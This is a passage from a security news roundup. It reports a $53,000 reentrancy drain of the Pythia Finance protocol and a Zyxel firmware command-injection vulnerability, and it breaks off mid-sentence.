Pythia hit with reentrancy attack
Decentralized finance protocol Pythia Finance was drained of $53,000 via a reentrancy attack on Sept. 3, according to a report from blockchain security firm Quill Audits. Pythia is an algorithmic stablecoin project that aims to use artificial intelligence to manage its treasury.
The attacker called the “claim rewards” function repeatedly, without allowing the reward balance to be updated after each call, allowing them to collect more rewards than they were entitled to.
According to the report, the attacker was able to call this function repeatedly and in rapid succession because Pythia called the token’s “safe transfer” function when rewards were distributed. Thus, a malicious token contract could call back Pythia, causing Pythia to call it back again, and resulting in a chain reaction that could drain the protocol’s funds.
Screenshot of Pythia partial audit report. (Pythia / X).
Quill Audits’ partial audit report for Pythia shows zero unresolved security issues, implying that the team may have upgraded the contract to prevent any further use of this exploit.
A reentrancy attack, in which an attacker calls a function repeatedly without allowing its code to fully execute, is one of the most common types of smart contract exploits.
Zyxel critical vulnerability
On Sept. 4, networking hardware manufacturer Zyxel disclosed a critical vulnerability in some of its networking devices that could have allowed attackers to execute code on user’s routers and access points, potentially allowing hackers to gain access to users’ devices.
According to the disclosure, the vulnerability was the result of “The improper neutralization of special elements in the parameter ‘host’ in the CGI program” of several different firmware versions. Because of this improper neutralization, these firmware versions “could allow an unauthenticated attacker to execute OS…
..
